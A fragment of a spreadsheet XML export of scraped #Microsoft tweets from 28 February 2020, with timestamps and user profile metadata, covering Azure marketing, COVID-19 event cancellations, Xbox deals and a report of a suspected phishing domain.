    <t>Fri Feb 28 14:30:16 +0000 2020</t>
  </si>
  <si>
    <t>Attackers probing for vulnerable #Microsoft Exchange Servers, is yours one of them? https://t.co/vVH5OgvFNP #HelpNetSecurity</t>
  </si>
  <si>
    <t>Fri Feb 28 14:30:14 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">
Due to the outbreak of the Coronavirus coVID-19, the Microsoft Ignite Tour on March 4 and 5 in Zurich is cancelled. The Swiss government has decided to cancel all events involving more than 1000 people until 15 March.
#Microsoft #Ignite #IgniteTour #Switzerland #coVID19 https://t.co/Tc9HTQgFKx</t>
  </si>
  <si>
    <t>{'id': 1050815499976802304, 'id_str': '1050815499976802304', 'name': 'stevenbart.com', 'screen_name': 'stevenbartcom', 'location': 'Vevey, Suisse', 'description': 'Blog sur SCCM et autres technologies Microsoft, trucs et astuces', 'url': 'https://t.co/BZRaFjHNQU', 'entities': {'url': {'urls': [{'url': 'https://t.co/BZRaFjHNQU', 'expanded_url': 'https://stevenbart.com', 'display_url': 'stevenbart.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Fri Oct 12 18:28:33 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1051216809981034501/vsc_Kd1x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051216809981034501/vsc_Kd1x_normal.jpg', 'profile_link_color': '1B6DC1',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</si>
  <si>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14:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Last week, James Phillips of Microsoft announced new AI features across the organization. 
https://t.co/ydMQl1EJ8Y #AI #customerinsights #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 14:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Application Gateway by Prashant Kumbhar cc @CsharpCorner https://t.co/QtTtNCiquY https://t.co/ehzWivrI1U</t>
  </si>
  <si>
    <t>John Hamm at @TexasChildrens talks to Jeff Carlat about some of the typical challenges they've faced on their #DigitalTransformation. 
#HPEalliances #Microsoft https://t.co/5dAbHt9WVN</t>
  </si>
  <si>
    <t>Fri Feb 28 14:28:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft email Services are worst  #hotmail or outlook both r worst Strict Recovery Mechanism  @Microsoft @Outlook i lost my fb cause of @Facebook @MicrosoftIndia #Support</t>
  </si>
  <si>
    <t>{'id': 949964790, 'id_str': '949964790', 'name': 'Pranjal Vyas â™', 'screen_name': 'vyaspranjal33', 'location': 'Ahmedabad', 'description': 'Psychology | Cyber Security', 'url': 'https://t.co/qsT9TAFQpf', 'entities': {'url': {'urls': [{'url': 'https://t.co/qsT9TAFQpf', 'expanded_url': 'https://vyaspranjal33.github.io', 'display_url': 'vyaspranjal33.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 96, 'listed_count': 0, 'created_at': 'Thu Nov 15 15:46:26 +0000 2012', 'favourites_count': 1188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1713, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '94D487', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206124955596939264/jm6QV7sc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206124955596939264/jm6QV7sc_normal.jpg',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</si>
  <si>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Feb 28 14:28:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's pledge that it won't make consumers re-buy their games 
https://t.co/6MWVkV5zNf
#indiedev #gamedev #XboxSeriesX  #microsoft @GIBiz #game</t>
  </si>
  <si>
    <t>{'id': 2894651344, 'id_str': '2894651344', 'name': 'Cogent', 'screen_name': 'CogentCoder', 'location': '', 'description': 'Game developers specializing in Ramen Noodle Mallets!', 'url': 'https://t.co/tiqG7vv5k9', 'entities': {'url': {'urls': [{'url': 'https://t.co/tiqG7vv5k9', 'expanded_url': 'http://cogent.kidsblast.com/', 'display_url': 'cogent.kidsblast.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1316, 'friends_count': 2429, 'listed_count': 219, 'created_at': 'Thu Nov 27 13:38:45 +0000 2014', 'favourites_count': 3810, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10564,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'http://pbs.twimg.com/profile_images/709528628695060480/lj1uXE7H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/709528628695060480/lj1uXE7H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2894651344/1417277772',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</si>
  <si>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14:27:42 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign Vatican pledge for ethical AI https://t.co/dhGmMVoriL via @financialtimes</t>
  </si>
  <si>
    <t>{'id': 14624434, 'id_str': '14624434', 'name': 'Vikki BradneySpencer', 'screen_name': 'VikkiBS', 'location': 'London, England', 'description': 'Communications Leader IBM. B2B. Always listening, learning and doing. Passionate about kids education. And scooting to work. Views are my own.', 'url': 'https://t.co/2dzFSqDGlx', 'entities': {'url': {'urls': [{'url': 'https://t.co/2dzFSqDGlx', 'expanded_url': 'http://ibm.com/uk', 'display_url': 'ibm.com/uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1193, 'friends_count': 1195, 'listed_count': 43, 'created_at': 'Fri May 02 10:50:42 +0000 2008', 'favourites_count': 3251, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1849,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'http://pbs.twimg.com/profile_images/597712848031092738/AOiHlf3b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/597712848031092738/AOiHlf3b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14624434/1401296109',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</si>
  <si>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Fri Feb 28 14:27:11 +0000 2020</t>
  </si>
  <si>
    <t>Taking this  to a new level. And this time, we brought our friends from @SevOneInc and @ParkMyCloud with us... #Cloud #Kubernetes #DevOps #microservices #containers #Cisco #Microsoft #AWS #IBM #Google https://t.co/dTZaQeXv1T</t>
  </si>
  <si>
    <t>{'id': 1365314413, 'id_str': '1365314413', 'name': 'Tom Murphy', 'screen_name': 'TomMurphyTurbo', 'location': 'Boston, MA', 'description': 'Turbonomic is one of the fastest-growing technology companies in the virtualization and cloud management space, trusted by thousands of enterprises globally.', 'url': 'https://t.co/0WsCRIK96S', 'entities': {'url': {'urls': [{'url': 'https://t.co/0WsCRIK96S', 'expanded_url': 'http://turbonomic.com', 'display_url': 'turbonomic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 45, 'listed_count': 0, 'created_at': 'Fri Apr 19 20:13:36 +0000 2013', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 578,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'http://pbs.twimg.com/profile_images/1094016026277265408/YkACcMts_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1094016026277265408/YkACcMts_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1365314413/1532443086',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</si>
  <si>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14:22:15 +0000 2020</t>
  </si>
  <si>
    <t>My heart is in the #cloud 
Build #apps in your favorite #programming languages using sample #code, get involved in the #developer community, and participate in local and online events https://t.co/TGT8Z211po 
#Microsoft #Azure https://t.co/j71Z2YVpgt</t>
  </si>
  <si>
    <t>{'id': 3226093904, 'id_str': '3226093904', 'name': 'Ela MoÅ›cicka', 'screen_name': 'ElaMoscicka', 'location': 'Warszawa, Mazowieckie', 'description': 'ðŸŒŸ#TalentSourcer @Microsoft\nðŸ”¥#Hiring #Devs for our teams in Europe\nðŸš€On my way to become a #SoftwareEngineerðŸ‘©ðŸ»\u200dðŸ’» \nðŸ“© elmoscic@microsoft.com\n#WomenInTech', 'url': 'https://t.co/cM83l437lf', 'entities': {'url': {'urls': [{'url': 'https://t.co/cM83l437lf', 'expanded_url': 'https://elamoscicka.github.io/', 'display_url': 'elamoscicka.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4102, 'friends_count': 186, 'listed_count': 224, 'created_at': 'Mon May 25 11:10:59 +0000 2015', 'favourites_count': 25746, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9456,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'http://pbs.twimg.com/profile_images/1170278974649511938/sC6vGBpp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170278974649511938/sC6vGBpp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3226093904/1496662719',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</si>
  <si>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14:20:50 +0000 2020</t>
  </si>
  <si>
    <t>AWS Cloud Practitioner
Know More;
https://t.co/Pq9hYdtqRw
#aws,#cloudcomputing,#devops,#azure,#amazon,#amazonwebservices,#database,#innovation,#bigdata,#cloud,#datascience,#developer,#TheManMusicVideo,#microsoft,#technology,#BTSComebackSpecial,#ThursdayMotivation,#itim,
#google https://t.co/SpKk3gFHXL</t>
  </si>
  <si>
    <t>Fri Feb 28 14:19:50 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Suspected #phishing domain
 https://microsoftexcelonline.com
 AS14061 [157.245.250.32]
 Let's Encrypt Authority X3
Tags: #microsoft #online #opendir
https://t.co/A5McHEXcwP</t>
  </si>
  <si>
    <t>Fri Feb 28 14:17:33 +0000 2020</t>
  </si>
  <si>
    <t>Miss yesterdays webcast on administering, scheduling, and delivering Microsoft Teams Events? Grab the recording and associated resources. #microsoft #microsoftteams #microsoftstream #webcast https://t.co/6g6x0XmlLo</t>
  </si>
  <si>
    <t>Fri Feb 28 14:16:50 +0000 2020</t>
  </si>
  <si>
    <t>The latest The Microsoft R Server Daily! https://t.co/V4vRUl0hUj Thanks to @CelerityLimited #microsoft #webappdevelopment</t>
  </si>
  <si>
    <t>{'id': 23242773, 'id_str': '23242773', 'name': 'Jen Stirrup #MakeYourDataWork', 'screen_name': 'jenstirrup', 'location': 'London, England', 'description': '#AI #Analytics #BusinessIntelligence influencer. #MVPBuzz, Microsoft Regional Director, Keynote Speaker, \n#DataScience #BeKind https://t.co/NVoLRnGPlF https://t.co/W653ZVQXTu', 'url': 'https://t.co/JlkRBFxh8y', 'entities': {'url': {'urls': [{'url': 'https://t.co/JlkRBFxh8y', 'expanded_url': 'http://www.jenstirrup.com', 'display_url': 'jenstirrup.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NVoLRnGPlF', 'expanded_url': 'http://data-relish.com', 'display_url': 'data-relish.com', 'indices': [127, 150]}, {'url': 'https://t.co/W653ZVQXTu', 'expanded_url': 'http://jenstirrup.com', 'display_url': 'jenstirrup.com', 'indices': [151, 174]}]}}, 'protected': False, 'followers_count': 18259, 'friends_count': 11729, 'listed_count': 1611, 'created_at': 'Sat Mar 07 22:27:44 +0000 2009', 'favourites_count': 3362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93465, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '214542', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1026233960660197376/5Kz5qytZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026233960660197376/5Kz5qytZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23242773/1578652917', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '3B615D', 'profile_text_color': 'B4D9AD', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 14:16:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will have no Server 2019 or SQL 2019 certifications! It will only be part of Azure Infrastructure and Data certs. What does that tell you about the future? #microsoft #azure #certifications #MCSA #MCSE
https://t.co/v51VxangGF</t>
  </si>
  <si>
    <t>{'id': 875175556530262016, 'id_str': '875175556530262016', 'name': 'Ryan Lowell', 'screen_name': 'RyanLowellFL', 'location': 'Fort Lauderdale, FL', 'description': 'Microsoft Azure Architect and Technology Strategist, Microsoft Consultant at Champion Solutions Group', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 46, 'listed_count': 0, 'created_at': 'Thu Jun 15 02:18:07 +0000 2017', 'favourites_count': 11,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'http://pbs.twimg.com/profile_images/1154478229568282624/p7dGR8Cn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154478229568282624/p7dGR8Cn_normal.jpg',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</si>
  <si>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14:15:50 +0000 2020</t>
  </si>
  <si>
    <t>Check out episode 1 for insight in to the Year of the Nurse and Midwife #healthcare #microsoft https://t.co/RK6vDdO8Hc</t>
  </si>
  <si>
    <t>Fri Feb 28 14:15:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says results could be hit by coronavirus.
Microsoft is unlikely to hits its projected quarterly revenue due to the coronavirus outbreak playing havoc with the supply chain.
https://t.co/yUsi9Abde5
#microsoft #revenue #coronavirus</t>
  </si>
  <si>
    <t>{'id': 1598544426, 'id_str': '1598544426', 'name': 'Bridewell Consulting', 'screen_name': 'BWC_Security', 'location': 'United Kingdom', 'description': 'Delivering a wide range of cost-effective Security and Risk Consulting Solutions to our clients across the UK.', 'url': 'https://t.co/mTT18lIpFb', 'entities': {'url': {'urls': [{'url': 'https://t.co/mTT18lIpFb', 'expanded_url': 'http://www.bridewellconsulting.com', 'display_url': 'bridewellconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4449, 'friends_count': 1729, 'listed_count': 187, 'created_at': 'Tue Jul 16 14:45:34 +0000 2013', 'favourites_count': 1362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7040,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'http://pbs.twimg.com/profile_images/1135813561777819648/7jX90_w6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135813561777819648/7jX90_w6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1598544426/1560159953',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</si>
  <si>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14:12:25 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 14:12:17 +0000 2020</t>
  </si>
  <si>
    <t>Une Xbox One 1To s'invite dans le Shop 
#xboxone #microsoft #matosandgames https://t.co/omdDUKZhOW</t>
  </si>
  <si>
    <t>{'id': 314837668, 'id_str': '314837668', 'name': 'Matos and Games', 'screen_name': 'MatosandGames', 'location': 'France', 'description': 'Jeux VidÃ©o Vintage &amp; RÃ©trogaming', 'url': 'https://t.co/utcnO042bU', 'entities': {'url': {'urls': [{'url': 'https://t.co/utcnO042bU', 'expanded_url': 'http://www.matosandgames.fr', 'display_url': 'matosandgames.fr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1132, 'friends_count': 1817, 'listed_count': 41, 'created_at': 'Fri Jun 10 22:02:52 +0000 2011', 'favourites_count': 2042, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14000, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '787A7A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/831154341524422659/hUARfokA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/831154341524422659/hUARfokA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/314837668/1527577416', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': '525252', 'profile_sidebar_fill_color': 'CFCFCF', 'profile_text_color': 'FF0000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 14:12:11 +0000 2020</t>
  </si>
  <si>
    <t>The latest The SQL Server 2017 Daily! https://t.co/cIa3Dd5Mxf Thanks to @Simple_Talk #sqlserver #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 14:12:00 +0000 2020</t>
  </si>
  <si>
    <t>MEGA MAN LEGACY COLLECTION
Capcom - Xbox One
#capcom #xboxone #microsoft #playasia #affiliate #weeklyspecial #megaman #sale
List price: US$ 20.89
Special price: US$ 17.99*
You save: US$ 2.90 (14%)
https://t.co/pl8whiCRPZ https://t.co/HHTKOPtp5f</t>
  </si>
  <si>
    <t>Fri Feb 28 14:10:31 +0000 2020</t>
  </si>
  <si>
    <t>The Big Five: Largest Acquisitions by #Tech Company
#Apple
#Amazon
#Google
#Microsoft
#facebook
The Big Five tech companies are rapidly reshaping the global tech landscape with their acquisitions, devouring any competitor who gets in their way.
https://t.co/1ovpSDH7Te</t>
  </si>
  <si>
    <t>{'id': 99674560, 'id_str': '99674560', 'name': 'Dr. Marcell Vollmer', 'screen_name': 'mvollmer1', 'location': 'Munich, Bavaria', 'description': 'Chief Innovation Officer @Celonis. Passionate about life &amp; coffee. PhD &amp; MBA in Economics. Social Media enthusiast and curious to continuously learn &amp; grow', 'url': 'https://t.co/EsPFMBdrDN', 'entities': {'url': {'urls': [{'url': 'https://t.co/EsPFMBdrDN', 'expanded_url': 'https://www.linkedin.com/in/marcellvollmer/', 'display_url': 'linkedin.com/in/marcellvollâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50154, 'friends_count': 43506, 'listed_count': 585, 'created_at': 'Sun Dec 27 09:07:18 +0000 2009', 'favourites_count': 202957, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 80623,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'http://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99674560/1486476950',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</si>
  <si>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14:08:16 +0000 2020</t>
  </si>
  <si>
    <t>Interesting article on #Microsoft
,#Azure optimization when moving workloads to the #cloud
 https://t.co/U0BivlvWNQ</t>
  </si>
  <si>
    <t>{'id': 794244878116929537, 'id_str': '794244878116929537', 'name': 'Ryan P Redmond', 'screen_name': 'RyanPRedmond', 'location': 'Salt Lake City, UT', 'description': '#CX, #VoC and #CDYX.  Asking questions about the intersection of Business Strategy &amp; Leadership mixed with CRM, Technology, Kung Fu and Red Wine.', 'url': 'https://t.co/FxK8pTNVsb', 'entities': {'url': {'urls': [{'url': 'https://t.co/FxK8pTNVsb', 'expanded_url': 'http://www.customerdynamics.com', 'display_url': 'customerdynamics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 223, 'listed_count': 1, 'created_at': 'Thu Nov 03 18:28:30 +0000 2016', 'favourites_count': 297, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 194,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'http://pbs.twimg.com/profile_images/794248439836000256/idGFZ21r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/794248439836000256/idGFZ21r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/794244878116929537/1478199430',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</si>
  <si>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14:06:00 +0000 2020</t>
  </si>
  <si>
    <t>Join us in Leeds on the 16 March as we showcase #Microsoft 365 and #Surface devices. Well also be focusing on how they enable collaboration, accessibility &amp;amp; inclusion that power your organisation's transformation and empowers your employees. Register now https://t.co/FATDTeDapj https://t.co/A5Hv5CfNlM</t>
  </si>
  <si>
    <t>Fri Feb 28 14:05:09 +0000 2020</t>
  </si>
  <si>
    <t>Discover 7 benefits of integrating #Microsoft #D365 with your other business systems and web services https://t.co/r2QPINOFnU</t>
  </si>
  <si>
    <t>{'id': 861881068231815168, 'id_str': '861881068231815168', 'name': 'BPA Platform - Business Process Automation', 'screen_name': 'CodelessBPA', 'location': 'England, United Kingdom', 'description': 'BPA Platform enables you to automate processes and integrate  business systems quickly and easily through drag and drop technology.', 'url': 'https://t.co/499gFEy947', 'entities': {'url': {'urls': [{'url': 'https://t.co/499gFEy947', 'expanded_url': 'https://www.codelessplatforms.com/business-process-automation-platform/', 'display_url': 'codelessplatforms.com/business-proceâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 51, 'listed_count': 2, 'created_at': 'Tue May 09 09:50:34 +0000 2017', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3067,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'http://pbs.twimg.com/profile_images/861882265093234688/zgYmQhFe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861882265093234688/zgYmQhFe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/861881068231815168/1582200021', 'profile_link_color': '263645',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</si>
  <si>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14:04:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release KB4535996 for #Windows10 May 2019 and November 2019 Update with battery improvements, more   https://t.co/bKxJKeJkQl by @mspoweruser</t>
  </si>
  <si>
    <t>Fri Feb 28 14:04:13 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Redefine staff collaboration and workflows with Process Fusion: " https://t.co/qWOHpXxnPC
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Fri Feb 28 14:04:02 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/Q9NuzWvPDa</t>
  </si>
  <si>
    <t>Fri Feb 28 14:02:34 +0000 2020</t>
  </si>
  <si>
    <t>Did you know the @CIPD have launched eight new learning courses for people professionals?
Find out more: https://t.co/HhNynknw9D
#hr #humanresources #cipd #learning #office365 #microsoft #microsoft365 https://t.co/eHZrnhuHke</t>
  </si>
  <si>
    <t>Fri Feb 28 14:01:37 +0000 2020</t>
  </si>
  <si>
    <t>Should I respond and ask how we make the #microsoft website better? #coldcall #spam  https://t.co/TIAZ05Z2PS</t>
  </si>
  <si>
    <t>Fri Feb 28 14:01:36 +0000 2020</t>
  </si>
  <si>
    <t>Ctrl + Enter for Page Break: Type in a Page Break in #Word using Ctrl+Enter. #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 14:01:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recognized by #Forrester as a leader in #EnterpriseBI in latest report, "The Forrester Wave: Enterprise BI Platforms (Vendor-Managed), Q3 2019." Highest scores in strategy and market presence. Read the blog. https://t.co/EyqvjZkloo</t>
  </si>
  <si>
    <t>Fri Feb 28 14:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Educating Educators: Microsoft's Tips for Security Awareness Training
https://t.co/UC9lghqMe2
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #SecurityAwarenessTraining</t>
  </si>
  <si>
    <t>Fri Feb 28 13:58:22 +0000 2020</t>
  </si>
  <si>
    <t>Remember, good times. I am wondering about the cool moments as a Microsoft MVP.
@samuelltr @santos_pg @diazantuna 
#Microsoft https://t.co/jvdWLfB3GA</t>
  </si>
  <si>
    <t>{'id': 22083760, 'id_str': '22083760', 'name': 'ðŸ‡»ðŸ‡ª ðŸ‡®ðŸ‡ªðŸ‡ªðŸ‡¸ðŸ’»Peter Frank ðŸ’» ðŸ‡»ðŸ‡ª ðŸ‡®ðŸ‡ªðŸ‡ªðŸ‡¸', 'screen_name': 'peterdiaz33', 'location': 'ÃœT: 10.495391,-66.907202', 'description': 'ðŸ‡»ðŸ‡ªVenezuelan &amp; ðŸ‡ªðŸ‡¸Spanish of â™¥ï¸ living in Ireland ðŸ‡®ðŸ‡ª #Cybersecurity #Security #CyberWar CEH-CHFI-MCT|Digital Forensics #356|Tweets are my own', 'url': 'https://t.co/LP1sXdegjn', 'entities': {'url': {'urls': [{'url': 'https://t.co/LP1sXdegjn', 'expanded_url': 'http://www.ucenespanol.com', 'display_url': 'ucenespanol.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1130, 'friends_count': 1123, 'listed_count': 129, 'created_at': 'Fri Feb 27 00:12:35 +0000 2009', 'favourites_count': 8765, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19621,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'http://pbs.twimg.com/profile_images/1235164572069302272/Nun1kWq4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235164572069302272/Nun1kWq4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22083760/1579010749', 'profile_link_color': '0084B4',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</si>
  <si>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Feb 28 13:57:30 +0000 2020</t>
  </si>
  <si>
    <t>Educating Educators: Microsoft's Tips for Security Awareness Training
https://t.co/xY2tUdjQ2X
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #SecurityAwarenessTraining</t>
  </si>
  <si>
    <t>Fri Feb 28 13:53:49 +0000 2020</t>
  </si>
  <si>
    <t>Kudos to #Microsoft, Chevron and other global companies who have asked their employees to work #remotely as a precaution against the novel #Coronavirus. https://t.co/TVDHGgqC5X</t>
  </si>
  <si>
    <t>Fri Feb 28 13:52:48 +0000 2020</t>
  </si>
  <si>
    <t>Checking out the demo cant fuckin wait for the launch of Nioh....#nioh2 #gamer #gaming #nerd #geek #streamer #streaming #twitch #ps4 #ps4pro #pcgamer #xboxone #microsoft #sony #playstation #nintendo #switch... https://t.co/c4DR27ZOn2</t>
  </si>
  <si>
    <t>Fri Feb 28 13:52:08 +0000 2020</t>
  </si>
  <si>
    <t>#blazor expert and @_FlagshipGroup    tech leader @chris_sainty talking about coding and rapid prototyping at #NorDevCon2020 
#microsoft #developers #rapidprototyping #conference #Norwich https://t.co/cYJcqGNFmn</t>
  </si>
  <si>
    <t>{'id': 2444492405, 'id_str': '2444492405', 'name': 'IJYI', 'screen_name': 'IjyiLtd', 'location': 'Ipswich, England', 'description': 'Software Delivery &amp; DevOps Experts. We help customers to develop innovative, high quality and cost-effective solutions to support their business.', 'url': 'https://t.co/me7hgbOmte', 'entities': {'url': {'urls': [{'url': 'https://t.co/me7hgbOmte', 'expanded_url': 'http://www.IJYI.com', 'display_url': 'IJYI.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 487, 'friends_count': 774, 'listed_count': 17, 'created_at': 'Sat Mar 29 12:57:58 +0000 2014', 'favourites_count': 757, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1141,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'http://pbs.twimg.com/profile_images/916038398342770691/_KG3pOJm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/916038398342770691/_KG3pOJm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2444492405/1557390102',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</si>
  <si>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13:50:13 +0000 2020</t>
  </si>
  <si>
    <t>Sonasoft has stood out as a cloud service provider. Sonasoft has achieved our highest Gold membership level for the following key Competencies: Cloud Platform, Cloud Productivity, Collaboration &amp;amp; Content, and Datacenter, said Joshua Shea. #Microsoft #ArtificialIntelligence  #AI</t>
  </si>
  <si>
    <t>{'id': 1040045977, 'id_str': '1040045977', 'name': 'NJ_Toad', 'screen_name': 'GreenTeamToad', 'location': 'Atlantic City', 'description': '#OTCTrader 15+yrs NO PROMO BS #Invested in stocks mentioned) #GTEmpire #Artificialintelligence #AI #420legalize #WEED #Pennystocks Simply we will not LOSE!', 'url': 'https://t.co/ClYLQwGsG6', 'entities': {'url': {'urls': [{'url': 'https://t.co/ClYLQwGsG6', 'expanded_url': 'http://instagram.com/nj_toad', 'display_url': 'instagram.com/nj_toad', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1225, 'friends_count': 764, 'listed_count': 15, 'created_at': 'Thu Dec 27 16:43:50 +0000 2012', 'favourites_count': 4741, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8608,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'http://pbs.twimg.com/profile_images/1232386030579462144/6T_xLOOX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232386030579462144/6T_xLOOX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1040045977/1541531514', 'profile_link_color': '333333', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:47:53 +0000 2020</t>
  </si>
  <si>
